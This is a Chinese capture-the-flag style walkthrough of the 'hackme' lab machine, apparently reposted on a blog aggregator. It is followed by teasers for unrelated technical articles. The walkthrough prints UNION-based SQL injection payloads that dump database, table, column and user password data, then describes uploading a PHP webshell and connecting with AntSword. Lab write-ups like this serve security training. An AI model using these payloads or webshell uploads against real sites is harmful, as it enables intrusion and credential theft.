hackme靶机通关攻略

embedded/2025/3/18 2:44:45/
第一步:确定靶机IP

第二步:使用御剑后台扫描工具扫描敏感文件

第三步:访问register.php注册登录,进入welcome.php页面

第四步:访问一个不存在的页面,确定网站使用的中间件是Apache(无用)

第五步:返回welcome.php页面,单点search会出现很多书,推测存在SQL注入漏洞

第六步:确定闭合方式为单引号

第七步:判断字段数为3、判断回显位置

第八步:爆破数据库名、爆破表名、爆破字段名

#爆破数据库名
OSNT' union select database(),2,3##爆破表名
OSNT' union select 1,2,table_name from information_schema.tables where table_schema='webapphacking'##爆破字段名
OSNT' union select 1,2,column_name from information_schema.columns where table_name='users'##爆破敏感信息
OSNT' union select 1,2,group_concat(name,'~',pasword) from users##发现管理员账户
superadmin~2386acb2cf356944177746fc92523983#MD5解密密码
Uncrackable
第九步:登录管理员账户,发现上传文件的地方,尝试直接上传一句话木马shellshellshell.php

第十步:访问http://192.168.0.107/uploads/,发现成功上传,使用蚁剑连接,成功!

                                                                                                                        FROM  IYU_


http://www.ppmy.cn/embedded/173469.html

相关文章

OkHttp 的证书设置

OkHttp 的证书设置

在 Android 开发中,通过 OkHttp 自定义 SSLSocketFactory 和 X509TrustManager 可以有效增强 HTTPS 通信的安全性,防止中间人攻击(如抓包工具 Charles/Fiddler 的拦截)。以下是实现防抓包的关键技术方案: 一、Okhttp设…
阅读更多...
JVM 详解:Java 虚拟机的核心机制

JVM 详解:Java 虚拟机的核心机制

目录 引言:为什么 JVM 是 Java 生态的基石? 一、什么是 JVM? 1.1 JVM 的核心作用 二、JVM 的架构 2.1 类加载器(Class Loader) 2.2 运行时数据区(Runtime Data Areas) 2.3 执行引擎&#…
阅读更多...
《Python深度学习》第四讲:计算机视觉中的深度学习

《Python深度学习》第四讲:计算机视觉中的深度学习

计算机视觉是深度学习中最酷的应用之一,它让计算机能够像人类一样“看”和理解图像。想象一下,计算机可以自动识别照片中的物体、人脸,甚至可以读懂交通标志。这一切听起来是不是很神奇?其实,这一切都离不开深度学习中…
阅读更多...
kafka 中的 rebalance

kafka 中的 rebalance

Kafka 的 Rebalance(重平衡)机制本质上是一个协调过程,用于在消费者组内动态分配分区,以保证消费任务均匀分布。Rebalance 主要由 Kafka Consumer Group 协议(Group Membership Protocol)驱动,涉…
阅读更多...
Linux 文件与目录操作指令

Linux 文件与目录操作指令

以下是 Linux 文件与目录操作指令的详细整理&#xff0c;涵盖 基本操作、权限管理、查找统计、压缩解压 等场景&#xff0c;包含常用选项与示例&#xff1a; 一、目录导航与查看 1. pwd&#xff1a;显示当前目录的绝对路径 <BASH> pwd # 输出&#xff1a;/hom…
阅读更多...
OpenWebUI项目调研对比

OpenWebUI项目调研对比

开源地址&#xff1a;https://github.com/open-webui/open-webui 官方文档&#xff1a;https://docs.openwebui.com/ OpenWebUI(以前称为Ollama WebUl)是一款面向大型语言模型(LLMs)的用户友好型Web界面&#xff0c;支持Ollama和兼容OpenAl的API运行。 通过一个直观的界面&a…
阅读更多...
【STM32】USART串口协议串口外设-学习笔记

【STM32】USART串口协议串口外设-学习笔记

串口协议 通信接口 通信的目的&#xff1a;将一个设备的数据传送到另一个设备&#xff0c;扩展硬件系统。比如STM32芯片内部集成了很多功能模块&#xff0c;像定时器计数、PWM输出、AD采集等等。这些都是芯片内部的电路&#xff0c;这些电路的配置寄存器&#xff0c;数据寄存…
阅读更多...
SSL/TLS 1.2过程:Client端如何验证服务端证书?

SSL/TLS 1.2过程:Client端如何验证服务端证书?

快速回顾非对称加密和对称加密 首先快速说一下非对称加密和对称加密。非对称加密&#xff0c;就是有一个公钥和私钥(成对存在)。 公钥对一段文本A加密得到文本B&#xff0c;只有对应的私钥能对B解密得到A。 私钥对一段文本C加密得到文本D&#xff0c;只有对应的公钥能对D解密得…
阅读更多...
最新文章

Copyright @ 2022~2023